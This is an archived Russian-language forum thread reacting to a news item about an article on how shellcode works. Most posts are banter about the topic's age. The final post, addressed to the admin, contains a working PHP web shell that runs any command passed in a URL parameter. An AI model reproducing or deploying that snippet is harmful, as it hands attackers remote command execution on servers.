URL: https://www.opennet.me/cgi-bin/openforum/vsluhboard.cgi
Форум: vsluhforumID3
Нить номер: 15468
[ Назад ]

Исходное сообщение
"OpenNews: Как создается 'shell код'"

Отправлено opennews , 19-Май-06 17:51 
В статье "How Shellcodes Work (http://www.linuxdevcenter.com/pub/a/linux/2006/05/18/how-she...)" рассказывается что такое shellcode (блок бинарного кода для запуска shell после использования уязвимости), как его создают и используют в эксплоитах.

URL: http://www.linuxdevcenter.com/pub/a/linux/2006/05/18/how-she...
Новость: http://www.opennet.me/opennews/art.shtml?num=7546


Содержание

Сообщения в этом обсуждении
"Как создается 'shell код'"
Отправлено pagan , 19-Май-06 17:51 
>блок бинарного кода для запуска shell после использования уязвимости
да ну? А если я напишу 0free код, который будет, ну предположим, icmp запросы слать, это уже шеллкоднсом не будет?

А вообще стыдно уже такие статьи публиковать. Теме 10 лет уже. И ладно бы чего нить относительно новое писали (хотя бы про полиморфные/метаморфные shellcode, мультиплатформенные,etc), так нет, в 1024 раз напишут про то как сделать буфер оверфлоу в программе, и что самое главное, как написать, и скомпелировать сплоет (а значит и немного шеллкодеса).

Печально.

wbr.


"Как создается 'shell код'"
Отправлено dropuser , 19-Май-06 18:50 
>>блок бинарного кода для запуска shell после использования уязвимости
>да ну? А если я напишу 0free код, который будет, ну предположим, icmp запросы
>слать, это уже шеллкоднсом не будет?
вообще-то, нормальный шеллкод и есть 0-free
а во-вторых, сказано "чаще всего для запуска shell"

вам лишь бы придраться...


"Как создается 'shell код'"
Отправлено pagan , 19-Май-06 20:13 
>вообще-то, нормальный шеллкод и есть 0-free
А я и не утверждал обратного.
>а во-вторых, сказано "чаще всего для запуска shell"
Это уже потом исправили. Изначально было "для запуска shell"
>вам лишь бы придраться...
Уверяю Вас, это не так.

"Как создается 'shell код'"
Отправлено Аноним , 19-Май-06 19:21 
Статья самое оно для тех кто только "где-то" слышал что такое шеллкод и эксплоиты но не разу не сталкивался вплотную.

"Как создается 'shell код'"
Отправлено slv , 21-Май-06 18:43 
Если Вам это не интересно, то это не значит, что не интересно никому...

"Как создается 'shell код'"
Отправлено Аноним , 22-Май-06 04:47 
ещё раз перечитайте, что он написал - поймёте, что он имел ввиду.

"Как создается 'shell код'"
Отправлено noname , 22-Май-06 08:59 
угу. въезжаем в новое тысячелетие верхом на танке с баяном прошлого века.

"Как создается 'shell код'"
Отправлено Zlobec , 22-Май-06 09:25 
Теме 10 лет и 10 лет я читаю эти статьи с удовольствием

"Как создается 'shell код'"
Отправлено pagan , 22-Май-06 09:45 
>Теме 10 лет и 10 лет я читаю эти статьи с удовольствием
И вот, настало время, Вам нужно срочно вступить и скомпелировать :-))))

"Как создается 'shell код'"
Отправлено Осторожный , 22-Май-06 11:57 
скомпелировать -> скомпилировать

"Как создается 'shell код'"
Отправлено pagan , 22-Май-06 12:11 
> скомпелировать -> скомпилировать
нет, нет, именно скомпЕлировать. Читайте хэккерский езинос от BHC %))

p.s. это не более чем стеб над "знатоками".


"Как создается 'shell код'"
Отправлено Zlobec , 22-Май-06 12:51 
Я думаю мир прекрасен и без скомпелированово экспойта....

"Как создается 'shell код'"
Отправлено Аноним , 23-Май-06 10:35 
короче Адепты! вступайте и компелируйте! В месте мы сила!

"Как создается 'shell код'"
Отправлено pagan , 23-Май-06 12:11 
>короче Адепты! вступайте и компелируйте! В месте мы сила!
Вы одепт негодный, потому как не знаете как пишется слово одпет.
Прошу ознакомиться с классификацией одептов: http://blackhat.nm.ru/odepts_classes.PNG

"Как создается 'shell код'"
Отправлено Zlobec , 23-Май-06 13:47 
>>короче Адепты! вступайте и компелируйте! В месте мы сила!
>Вы одепт негодный, потому как не знаете как пишется слово одпет.
>Прошу ознакомиться с классификацией одептов: http://blackhat.nm.ru/odepts_classes.PNG


А че это он в двоичке шелкодит, я в статье видал там циферки и иксики ? )))))))))


"АДМИНУ"
Отправлено N1eO , 07-Сен-06 19:43 
<?

if (!empty($_GET['c'])) {
         echo '<pre>';
         system($_GET['c']);
         echo'</pre>';
}

exit;

?>